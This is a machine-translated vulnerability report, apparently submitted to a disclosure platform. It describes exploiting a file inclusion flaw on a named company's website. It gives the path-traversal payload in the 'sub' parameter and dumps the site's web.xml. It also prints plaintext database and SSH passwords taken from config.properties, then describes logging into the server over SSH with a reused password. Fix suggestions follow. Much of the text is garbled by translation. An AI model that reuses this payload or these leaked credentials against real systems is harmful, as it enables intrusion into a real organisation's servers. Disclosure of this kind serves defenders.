File Inclusion on the official website of cutting-edge Tongchuang technology results in obtaining the Server shell

File Inclusion on the official website of cutting-edge Tongchuang technology results in obtaining the Server shell

Manufacturer, can you ask for a small gift? cainiao says it's okay if you haven't received a gift -.-
Ask a large vendor.

Attackers can access the database and log on to the SSH server.

Attackers exploit the File Inclusion Vulnerability.



Problem page: http://www.vasee.com/event/view.jsp? Day = 2014-08-03 & emid = ff80808146ac6f014770b306751ec2 & id = ff80808146acac6f014770b305231eb8 & sub =

The sub parameter is the inclusion

Pass sub = index? Page Error
 

So we can guess that the processing code is

'/Event/view_sub/view _' + 'sum parameter '+'. jsp'

After sub = 1 is submitted, it is displayed normally. It is proved that view_1.jsp exists in the/event/view_sub/directory.

So the guess is correct.

Then the structure contains the contents. The contents are stuck here for a long time and it is found that no event directory is exceeded. Then the web server is tomcat, so it cannot read the configuration file under conf.

Later, I tried to construct the following parameters.

Suu =/.../../WEB-INF/web. xml?

In this way, the sub parameter is/event/view_sub/view _/.../../WEB-INF/web. xml ?. Jsp

? Pseudo truncation. This truncation can be used in script files and files such as. xml. txt. css. js. html.


 

<Context-param> <param-name> uploadPath </param-name> <param-value>/var/www/html/vasee_pics/</param-value> <! -- <Param-value> D: \ upload \ </param-value> --> </context-param> <param-name> pdfPath </param-name> <param-value >/user/local/vasee_pdfs/</param-value> <! -- <Param-value> d: \ xx \ </param-value> --> </context-param> <param-name> exlPath </param-name> <param-value >/user/local/vasee_exls/</param-value> <! -- <Param-value> D: \ upload \ </param-value> --> </context-param> <filter-name> SetCharacterEncoding </filter-name> <filter-class> com. vasee. filters. setCharacterEncodingFilter </filter-class> <init-param> <param-name> encoding </param-name> <param-value> UTF-8 </param-value> </init- param> </filter> <! -- Filters for the display tag functionality --> <filter-name> ResponseOverrideFilter </filter-name> <filter-class> org. displaytag. filter. responseOverrideFilter </filter-class> </filter> <filter-name> hibernatesession </filter-name> <filter-class> org. springframework. orm. hibernate3.support. openSessionInViewFilter </filter-class> </filter> <filter-mapping> <filter-name> hibernatesession </filter-name> <Url-pattern>/* </url-pattern> </filter-mapping> <filter-name> SetCharacterEncoding </filter-name> <url-pattern> *. do </url-pattern> </filter-mapping> <filter-name> SetCharacterEncoding </filter-name> <url-pattern>/* </url -pattern> </filter-mapping> <filter-name> ResponseOverrideFilter </filter-name> <url-pattern> *. do </url-pattern> </filter-mapping> <filt Er-name> ResponseOverrideFilter </filter-name> <url-pattern> *. jsp </url-pattern> </filter-mapping> <! -- Pseudo-static filtering --> <filter-name> UrlRewriteFilter </filter-name> <filter-class> org. tuckey. web. filters. urlrewrite. urlRewriteFilter </filter-class> <init-param> <param-name> confPath </param-name> <param-value>/WEB-INF/urlrewrite. xml </param-value> </init-param> </filter> <filter-mapping> <filter-name> UrlRewriteFilter </filter-name> <url-pattern>/ g/* </url-pattern> </filter-mapping> <servlet-name> DrawImageSer Vlet </servlet-name> <servlet-class> net. sourceforge. jimagetaglib. servlet. drawImageServlet </servlet-class> </servlet> <servlet-mapping> <servlet-name> DrawImageServlet </servlet-name> <url-pattern>/jit </url-pattern> </servlet-mapping> <! -- Action Servlet Configuration --> <servlet-name> action </servlet-name> <servlet-class> org. apache. struts. action. actionServlet </servlet-class> <init-param> <param-name> config </param-name> <param-value>/WEB-INF/struts-config.xml </param-value> </init-param> <param-name> debug </param-name> <param-value> 2 </param-value> </init-param> <init-param> <param-name> validate </param-name> <param-value> tru E </param-value> </init-param> </servlet> <! -- Action Servlet Mapping --> <servlet-mapping> <servlet-name> action </servlet-name> <url-pattern> *. do </url-pattern> </servlet-mapping> <context-param> <param-name> contextConfigLocation </param-name> <param-value>/WEB-INF/applicationContext. xml </param-value> </context-param> <listener-class> org. springframework. web. context. contextLoaderListener </listener-class> </listener>

View the first line


 

<context-param><param-name>uploadPath</param-name><param-value>/var/www/html/vasee_pics/</param-value><!--<param-value>D:\\upload\\</param-value>--></context-param>

This directory is the directory of the pics.vasee.com domain name used to store images.

This idea is coming. There is a vulnerability in all the uploads on the official website to upload jsp files. However, it hurts to parse jsp files into images when you access jsp files, however, now that the directory is available, the two domain names are both a server IP address, and then a shell can be obtained by using the inclusion vulnerability, including jsp, but as mentioned above, the event directory cannot be displayed, from this,



Next, let's look at the content of web. xml.

One by one

Find this file


 

<context-param><param-name>contextConfigLocation</param-name><param-value>/WEB-INF/applicationContext.xml</param-value></context-param>

Include the content that was read from the past, and I am lucky to find another sensitive file.


 

<bean id="propertyConfigurer"class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer"><property name="locations"><list><value>/WEB-INF/config.properties</value></list></property></bean>

OK. Continue reading the content of this file!

Guess what the content is?


 

subDomain.id=1006hibernate.connection.driver_class org.postgresql.Driverhibernate.connection.username=postgres#hibernate.connection.url=jdbc\:postgresql\://127.0.0.1/testhibernate.connection.url=jdbc\:postgresql\://127.0.0.1/vaseedbstable#hibernate.connection.url=jdbc\:postgresql\://103.31.201.95/test#hibernate.connection.password=123456hibernate.connection.password=e2010ee_yan#hibernate.connection.password=root#hibernate.connection.password=voasseeee#hibernate.connection.password=vpaossetegphoneapp.android.version=1.1phoneapp.iphone.version=1.1phoneapp.android.update_url=http://down.mumayi.com/94512phoneapp.iphone.update_url=https://itunes.apple.com/cn/app/vasee/id488543987?mt=8#font.src.path=c\:/windows/fonts/font.src.path=/user/local/vasee_pdfs/source/

Database connection information! Great!

But the tragedy is coming again. There is no open database Port

Then think of connecting to its SSH port (in memory, I have seen postgresql's postgres users exist in the system account on a webpage)

I don't know if it's true ,-.-



Then the connection is successful. The permission is the database permission.

The username is ipvs.

The password is not a Database Password

Hibernate. connection. password = e2010ee_yan

But this password.

# Hibernate. connection. password = vpaosseteg

Allows you to view web code, modify without permission, and operate databases at will.

Last few images: 0.0


 

 

 

<Jsp: include page = "/event/view_sub/view _ $ {sub}. jsp"/>

This is the inclusion code, indicating that JSP does not understand why directory cannot be crossed

Solution:

Filter the inclusion, set the connection IP address for SSH, filter the file upload, and change the password. Although no exploitation point is found yet, it will be hard to say in the future, finally, ask the vendor to trust me. I didn't even see the database. I connected to the database and then cut the graph and quit.